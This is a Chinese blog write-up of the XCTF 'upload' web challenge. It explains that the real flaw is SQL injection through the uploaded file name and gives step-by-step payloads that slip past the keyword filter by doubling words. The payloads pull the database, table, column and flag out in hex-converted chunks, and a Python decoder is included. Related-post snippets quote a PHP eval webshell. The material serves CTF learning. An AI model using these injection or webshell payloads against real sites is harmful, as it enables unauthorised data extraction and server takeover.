攻防世界-web-upload

最新推荐文章于 2024-04-22 17:07:01 发布
最新推荐文章于 2024-04-22 17:07:01 发布
阅读量1k 收藏 23
点赞数 22
分类专栏: 安全 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuh2333/article/details/134895128
版权

1. 题目描述

打开链接,是这样的一个注册界面

先试着注册一个账号看看,这里简单操作,注册test/test,注册完后进行登录

登录成功后进入到这样一个文件上传界面。当前从界面上得到的信息暂时就是这些了。

2. 思路分析

既然存在上传,那么大概率上传点存在漏洞,我们先试试随便上传一个php文件

这里提示很明显了,说明存在WAF,对我们的文件拓展名进行了限制

试着修改下文件后缀,这里修改为jpg格式的,提示我们上传成功

既然上传成功了,试着用蚁剑连接下,发现失败,不过也正常,我们不知道文件的存储路径,而且上传的不是php。

除了文件上传外,是否还有其它的思路呢?我们注意到我们输入的文件名进行了回显,这里就可能存在sql注入,我们简单试下

注意到我们传入select关键字时,回显值中已经没有select了,说明被过滤掉了,为什么要过滤select呢?说明这里大概率存在sql注入。

好了,经过简单的验证,虽然说这道题名字取的是文件上传,但是实际上是文件名sql注入。

3. 解题过程

从上面的截图来看,实际上这道题是存在WAF的,因为过滤了select,那么我们首先要考虑的是如何绕过WAF

3.1 绕过WAF的限制

既然存在sql注入,那么select,from等关键字必须存在绕过方法,试了下大小写无法绕过,但是双写可以

试着查看下数据库

发现回显是0,说明这里大概率对回显进行了限制,而且限制了必须为数字,因此我们需要对sql查询语句进行调整,使得查出来的都是数字,这里做法是先转成16进制,再转化为10进制

但是回显后发现变成科学计数法了,因此我们每次只能取一部分字符,这里验证了一下,每次最多只能取12个字符,如果取13个,取出来的值就会变成科学计数法表示。

此时的文件名为:a' +(selecselectt conv(substr(hex(database()), 1, 12), 16, 10))+ '.jpg

然后再将这个十进制转化为字符串,这里使用如下脚本即可

import sys

num = int(sys.argv[1])
# 10进制 -> 16进制
hex_num = hex(num)[2:]

# 16进制 -> 字符串
bytes_data=bytes.fromhex(hex_num)
str=''.join(chr(byte) for byte in bytes_data)
print(str)

执行该脚本,转为的字符串为web_up

这个看上去不全,因此按照上述的步骤获取数据库名的后面的字符(这里注意文件数小于10个,如果超过10个,那么需要注销并重新登录)

继续将文件名设置为a' +(selecselectt conv(substr(hex(database()), 13, 12), 16, 10))+ '.jpg

所以,最终拼接起来,得到的数据库名为web_upload

3.2 重复上述步骤,进一步获取数据库中的其它字段(表名,列名,具体的值)

获取表名的payload如下:

a' +(selecselectt conv(substr(hex((seleselectct table_name frofromm information_schema.tables where table_schema='web_upload' limit 1, 1)), 1, 12), 16, 10))+ '.jpg

a' +(selecselectt conv(substr(hex((seleselectct table_name frofromm information_schema.tables where table_schema='web_upload' limit 1, 1)), 13, 12), 16, 10))+ '.jpg

a' +(selecselectt conv(substr(hex((seleselectct table_name frofromm information_schema.tables where table_schema='web_upload' limit 1, 1)), 25, 12), 16, 10))+ '.jpg

得到结果:

转换为字符串为:hello_flag_is_here

获取表中字段名的payload如下:

a' +(selecselectt conv(substr(hex((seleselectct column_name frofromm information_schema.columns where table_name='hello_flag_is_here' limit 0, 1)), 1, 12), 16, 10))+ '.jpg

a' +(selecselectt conv(substr(hex((seleselectct column_name frofromm information_schema.columns where table_name='hello_flag_is_here' limit 0, 1)), 13, 12), 16, 10))+ '.jpg

得到结果:

转换为字符串:i_am_flag

最后,查询表中字段值的payload如下:

a' +(selecselectt conv(substr(hex((seleselectct i_am_flag frofromm hello_flag_is_here)), 1, 12), 16, 10))+ '.jpg

a' +(selecselectt conv(substr(hex((seleselectct i_am_flag frofromm hello_flag_is_here)), 13, 12), 16, 10))+ '.jpg

a' +(selecselectt conv(substr(hex((seleselectct i_am_flag frofromm hello_flag_is_here)), 25, 12), 16, 10))+ '.jpg

得到结果:

同样转换成字符串得到flag为:!!_@m_Th.e_F!lag

4. 总结

整体来看,这道题属于一道综合性比较强的题目,虽然是文件上传,但是实际的攻击点在于sql注入,这里是有一点迷惑性的。然后就是针对sql注入,题目中也涉及到了各种sql绕过手段以及进制转化相关的知识点,因此这里还是有一定难度的,不过最终做出来的话也可以积累很多知识,收获很大。

wuh2333
关注
  • 22
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-upload
qq_44065556的博客
09-24 1147
进入场景映入眼帘 需要注册账号 注册好之后,登录跳转页面 突破点应该就在这里了 我们先上传一个php文件 显示不正确的文件扩展名,被拦了 用burp抓包改信息 成功上传 但是没有上传路径 只能上传不能利用 思考(题目给的是upload,给的引导思路 就是上传文件拿flag) 我试着上传jpg,png格式的图片文件 有文件名回显,这说明文件已经被传到了数据库中,游览器又从数据库中读取了上传的文件,那么这个过程久有可能触发sql注入 ...
攻防世界upload
qq_51744055的博客
05-03 643
Hex()是MySQL的Sring函数。 此方法返回给定数字或字符串的十六进制字符串 a' +(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg 数据库名变成16进制 选取从第一个字母开始,往后数12个字母 hex 16进制再16进制 CONV(n,from_radix,to_radix):用于将n从from_radix进制转到to_radix进制 substr(str,start,length):将str从st
CTF-WEB攻防世界题目实战解析upload1
最新发布
2301_76565920的博客
04-22 854
题目:upload 知识点:一句话木马,webshell,burpsuite拦截并修改数据包
攻防世界--upload
qq_46263951的博客
01-09 705
这道题真是涨芝士了,原来文件名也能SQL注入... 这里应该是将文件名存到数据库中并返回到页面上显示出来 测试这里通过select时,字母无回显,十六进制无法使用,所以要使用十进制,并且要防止溢出 select、from被过滤,双写绕过 CONV(n,from_radix,to_radix):用于将n从from_radix进制转到to_radix进制substr(str,start,length):将str从start长度为length分割 hex(str):将str转成十六进制 payl
file upload 攻防世界_攻防世界 upload
weixin_36443680的博客
02-23 234
攻防世界上的一道web题为什么我觉得完全不像萌新入坑的题呢 退坑还差不多吧一看名字以及页面想当然的就是文件上传了呗 结果各种尝试,也没什么办法,但是每次我们上传后会有文件名的回显 但是正常的文件上传也都有这种名字的回显,可能不太寻常的就是这个没有路径吧最后看的writeup 说是sql注入????不明白怎么能看出来是注入的图片文件名存在注入,并且过滤了select from 用双写就能绕过p...
攻防世界upload1
金 帛的博客
04-24 2348
攻防世界之文件上传
攻防世界Training-Stegano-1
10-31
攻防世界Training-Stegano-1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127614642
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界nice-bgm杂项
11-20
攻防世界nice_bgm杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953246
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
upload(simple)
02-07
自己写的,感兴趣的可以下载看看,对初学者有用,可以起参考作用。
攻防世界 | upload1
weixin_47982238的博客
10-07 235
打开网页后,发现是一个文件上传的网站(其实从名字就能看出来) 看一下源代码,了解网站的上传文件的要求——要求上传图片,且文件后缀名为jpg或者png Array.prototype.contains = function (obj) { var i = this.length; while (i--) { if (this[i] === obj) { return true; } } r
攻防世界的里的upload1
一大口木的博客
05-23 580
点击后的页面看一下我的一句话木马。
攻防世界-Web-upload1
uh_eng的博客
08-25 194
0x01 查看网页源代码,猜测应该是前端验证,只能上传图片文件。前端验证就很好办,把onchange=check()删掉就好了 0x02 准备一份一句话木马<?php eval($_POST['shell']);?>,保存为shell.php,然后上传shell.php,得到返回结果: 然后可以使用菜刀连接,由于我没有装菜刀,于是在浏览器中访问给定的位置,然后通过Hackbar提交POST数据: shell=system("ls ../");这个位置是自己试出来的 shell=highli
攻防世界upload1(web
yuanxu8877的博客
11-22 1028
攻防世界web-upload1
攻防世界进阶upload
舞动的獾
07-05 5334
攻防世界进阶upload 注册登陆后,发现上传页面 试着上传一个文件3.php: 内容如下: <?php eval(@$_POST['a']); ?> 我们试着将它改个名字抓包,并且改为jpg,措辞测试发现只有jog能够传上去 虽然上传成功,但是并不能显示出文件名的位置,蚁剑连接失败 看到回显名称有uid号,无奈的丝毫没有头绪 只好看了大佬的博客,竟然是注入,文件名称注入 当...
攻防世界XCTF:upload
末初的CSDN博客
03-08 821
这里有个注册登入,迷惑行为,漏洞不在这里 这题比较意外,不是上传题是sql注入而且还是文件名的SQL注入, 因为回显的只是文件名,然后它存入数据库的也可能是文件名,既然连接了数据库就可能存在注入漏洞。然后就能想到可能是文件名sql注入。 任何与数据库发生连接交互的地方都可能存在SQL注入! 然后就开始构造文件名的payload,首先介绍几个函数。 conv(N,from_base,to_ba...
【愚公系列】2023年06月 攻防世界-Webupload
时光隧道
06-20 6864
SQL注入的16进制绕过是指攻击者使用16进制编码绕过输入过滤和防御措施,从而执行恶意的SQL语句。例如,当输入过滤器检测到单引号时,它可能会将其替换为两个单引号,以避免SQL注入攻击。然而,攻击者可以使用16进制编码来绕过这一过滤器。这里的0x27是单引号的16进制编码,而0x2720656e7472616e63652070617373776f7264是" 'entrance password "的16进制编码,用来代替密码字段。攻击者可以使用类似的技术来绕过其他类型的输入过滤器和防御措施。
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值